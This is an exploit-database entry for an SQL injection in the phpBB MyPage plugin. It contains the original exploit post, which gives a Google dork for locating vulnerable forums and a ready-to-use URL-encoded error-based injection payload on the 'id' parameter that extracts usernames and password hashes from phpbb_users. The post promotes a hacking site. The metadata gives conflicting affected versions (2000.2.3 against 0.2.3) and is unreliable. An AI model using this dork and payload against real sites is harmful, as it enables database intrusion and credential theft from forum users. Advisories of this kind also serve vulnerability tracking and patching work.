SQL Injection on the plugin phpBB plugin MyPage

vendor:

MyPage Plugin

by:

CrazyMouse

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: MyPage Plugin

Affected Version From: 2000.2.3

Affected Version To: 2000.2.3

Patch Exists: YES

Related CWE: N/A

CPE: a:phpbb:mypage_plugin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64 (Firefox)

2011

SQL Injection on the plugin phpBB plugin MyPage

MyPage plugin (phpBB) is vulnerable to SQL Injection. An attacker can exploit this vulnerability to gain access to sensitive information from the database. The vulnerable parameter is 'id' which is passed to the 'mypage.php' script. An attacker can inject malicious SQL code into the 'id' parameter and execute it on the database. The vulnerable versions are 0.2.3 and older.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the plugin.

Source

Exploit-DB raw data:

====================================================
 MyPage plugin (phpBB) SQL Injection (All versions)
====================================================

====================================================
Improve your hacking knowledges !
====================================================
====================================================
VISIT http://HackSociety.net !
====================================================

# Exploit Title: SQL Injection on the plugin phpBB plugin MyPage
# Google Dork: inurl:"mypage.php?id="
# Date: 06/12/2011
# Author: CrazyMouse (from HackSociety.net)
# Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable)
# Tested on: Windows 7 x64 (Firefox)

====================================================
VISIT http://HackSociety.net !
====================================================


[~] Exploit:
  
       	http://localhost/forum/
 
 
[~]    	http://localhost/forum/mypage.php?id= (SQL)


[~] Example: 

	http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271


====================================================
  
# Thanks to 
 
Crassus
 
====================================================


====================================================
VISIT http://HackSociety.net !
====================================================